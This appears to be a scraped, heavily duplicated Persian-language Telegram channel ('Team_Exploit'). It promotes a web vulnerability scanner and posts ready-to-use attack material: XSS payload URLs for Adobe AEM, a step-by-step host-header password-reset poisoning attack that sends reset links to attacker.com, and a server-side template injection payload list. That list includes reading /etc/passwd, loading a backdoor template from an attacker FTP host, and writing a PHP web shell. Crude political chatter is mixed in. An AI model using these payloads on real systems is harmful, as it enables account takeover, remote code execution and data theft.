هدف این پروژه ساده سازی زمینه تست امنیت برنامه های پویا است. متا اسکنر OSTE یک اسکنر آسیب پذیری وب جامع است که چندین اسکنر DAST از جمله Nikto Scanner، OWASP ZAP، Nuclei، SkipFish و Wapiti را ترکیب می کند.
لیست آسیب پذیری های اصلی پشتیبانی شده:
SQL injection
Cross site scripting
OS command injection
XML injection
XSLT injection
XML External entites
code injection
host header injection
html injection
Template injection (server-side)
CRLF injection
OGNL injection
Skipfish Vulnerabilities support List.
Wapiti Vulnerabilities support List.
ZAP Active Attack list.
Nikto Vulnerabilities support List (Specified: Tunning 9 & 4).
Nuclei CVE-Template.
برای وارد شدن به آدرس گیت هاب کلیک کنید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
لیست آسیب پذیری های اصلی پشتیبانی شده:
SQL injection
Cross site scripting
OS command injection
XML injection
XSLT injection
XML External entites
code injection
host header injection
html injection
Template injection (server-side)
CRLF injection
OGNL injection
Skipfish Vulnerabilities support List.
Wapiti Vulnerabilities support List.
ZAP Active Attack list.
Nikto Vulnerabilities support List (Specified: Tunning 9 & 4).
Nuclei CVE-Template.
برای وارد شدن به آدرس گیت هاب کلیک کنید
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
قضیه اون فیلمی که از یه مدرس پخش شده بود، من چیزی نگفتم ولی کامنت های اونو که دیدم، گفتم واقعا دمتون گرم❤️
خیلی عجیبه
اول اینکه بین ۳ تا بالگرد، دقیقا بالگردی که حاج ابرام توش بوده بگا رفته
دوم اینکه چرا قبل از پرواز وضعیت هوا رو پیش بینی نکردن:/
سوم اینکه یعنی هیچ کیر خری نبوده بتونن پیداش کنن؟
اول اینکه بین ۳ تا بالگرد، دقیقا بالگردی که حاج ابرام توش بوده بگا رفته
دوم اینکه چرا قبل از پرواز وضعیت هوا رو پیش بینی نکردن:/
سوم اینکه یعنی هیچ کیر خری نبوده بتونن پیداش کنن؟
👍1
نکات Bounty Bug: بیش از 15 مشکل XSS در یک برنامه گسترده با استفاده از AEM گزارش شده است! 🚀 اگر به یک برنامه هدف با استفاده از AEM برخورد کردید، مطمئن شوید که از این پیلود های XSS برای چند برد سریع استفاده می کنید!
1️⃣ https://target.com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target.com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3⃣ https://target.com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
همیشه سعی کنید این مسائل را به تصاحب حساب افزایش دهید تا شانس پرداخت با شدت بالا را داشته باشید. هوشیار باشید! 🕵️♂️💡
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
1️⃣ https://target.com/1<img src=x data'a'onerror=alert(domain)>.childrenlist.htm
2️⃣ https://target.com/crx/de/setPreferences.jsp;%0A.html?language=en&keymap=<svg/onload=confirm(document.domain);>//a"
3⃣ https://target.com/etc/designs/xh1x.childrenlist.json//<svg onload=alert(document.domain)>.html
همیشه سعی کنید این مسائل را به تصاحب حساب افزایش دهید تا شانس پرداخت با شدت بالا را داشته باشید. هوشیار باشید! 🕵️♂️💡
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
نکات باگ بانتی !!!! Host Header Injection در https://example{.}com/Account/ForgotPassword
مراحل:
1. به قسمت لاگین اکانت بروید.
2. یک حساب آزمایشی ایجاد کنید.
3. به روی دکمه بازنشانی گذرواژه فراموش شده بزنید: https://examle{.}/Account/ForgotPassword
4. قبل از درج ایمیل
5. فاکسی پروکسی خود را روشن کنید.
6. برپ سوییت خود را باز کنید و به تب تاریخچه http بروید.
7. حالا ایمیل خود را وارد کنید. در تاریخچه http در burp
8. اکنون درخواست ارسال کنید و 200 پاسخ OK دریافت خواهید کرد.
9. به ایمیل/gmail خود بروید.
10. مقداری جادویی خواهید دید.
11. PoC آن پایین است. نکته! روی پیوند
بازنشانی رمز عبور من کلیک کنید:
attacker.com//█████/Account/ResetPassword?t=CfDJ8LnpFPwgh5FMpOb1F%2FCnxefoFCtP%2F0HrFpb7jdskSoUSujStlkgpGak5azwqOoBWm1DVWcQe3lrKczz%2B9tv568jSdFcc9DvArkFHWM1VKfWe37UhUKQrcpvvxAhtP73gcw%3D%3D
شما به دامنه مهاجم هدایت خواهید شد. اینگونه است که مهاجم پیوند بازنشانی رمز عبور قربانی را دریافت می کند تا بتواند حساب را تنها با میزبانی سرور خود انجام دهد و سایر اطلاعات حساس را دریافت کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
مراحل:
1. به قسمت لاگین اکانت بروید.
2. یک حساب آزمایشی ایجاد کنید.
3. به روی دکمه بازنشانی گذرواژه فراموش شده بزنید: https://examle{.}/Account/ForgotPassword
4. قبل از درج ایمیل
5. فاکسی پروکسی خود را روشن کنید.
6. برپ سوییت خود را باز کنید و به تب تاریخچه http بروید.
7. حالا ایمیل خود را وارد کنید. در تاریخچه http در burp
8. اکنون درخواست ارسال کنید و 200 پاسخ OK دریافت خواهید کرد.
9. به ایمیل/gmail خود بروید.
10. مقداری جادویی خواهید دید.
11. PoC آن پایین است. نکته! روی پیوند
بازنشانی رمز عبور من کلیک کنید:
attacker.com//█████/Account/ResetPassword?t=CfDJ8LnpFPwgh5FMpOb1F%2FCnxefoFCtP%2F0HrFpb7jdskSoUSujStlkgpGak5azwqOoBWm1DVWcQe3lrKczz%2B9tv568jSdFcc9DvArkFHWM1VKfWe37UhUKQrcpvvxAhtP73gcw%3D%3D
شما به دامنه مهاجم هدایت خواهید شد. اینگونه است که مهاجم پیوند بازنشانی رمز عبور قربانی را دریافت می کند تا بتواند حساب را تنها با میزبانی سرور خود انجام دهد و سایر اطلاعات حساس را دریافت کند.
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
SSTI برخی پیلود های
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Generic
${{<%[%'"}}%\.
{% debug %}
{7*7}
{{ '7'*7 }}
{2*2}[[7*7]]
<%= 7 * 7 %>
#{3*3}
#{ 3 * 3 }
[[3*3]]
${2*2}
@(3*3)
${= 3*3}
{{= 7*7}}
${{7*7}}
#{7*7}
[=7*7]
{{ request }}
{{self}}
{{dump(app)}}
{{ [] .class.base.subclassesO }}
{{''.class.mro()[l] .subclassesO}}
for c in [1,2,3] %}{{ c,c,c }}{% endfor %}
{{ []._class.base.subclasses_O }}
{{['cat%20/etc/passwd']|filter('system')}}
PHP
{php}print "Hello"{/php}
{php}$s = file_get_contents('/etc/passwd',NULL, NULL, 0, 100); var_dump($s);{/php}
{{dump(app)}}
{{app.request.server.all|join(',')}}
"{{'/etc/passwd'|file_excerpt(1,30)}}"@
{{_self.env.setCache("ftp://attacker.net:2121")}}{{_self.env.loadTemplate("backdoor")}}
{$smarty.version}
{php}echo id;{/php}
{Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
Python
{% debug %}
{{settings.SECRET_KEY}}
{% import foobar %} = Error
{% import os %}{{os.system('whoami')}}
┌<(channel>>>>)-[~]
└< (main)* >─» @Team_Exploit
Team Exploit
گروه هاکیری زارت شد که @mankihastme
شاید باور نکنید ولی این تو 20 دقیقه بن شد😂و اینکه اگه شما یه کانال بزنید و توش ویدیو پورن بزارید بعد ۲۴ بسته میشه!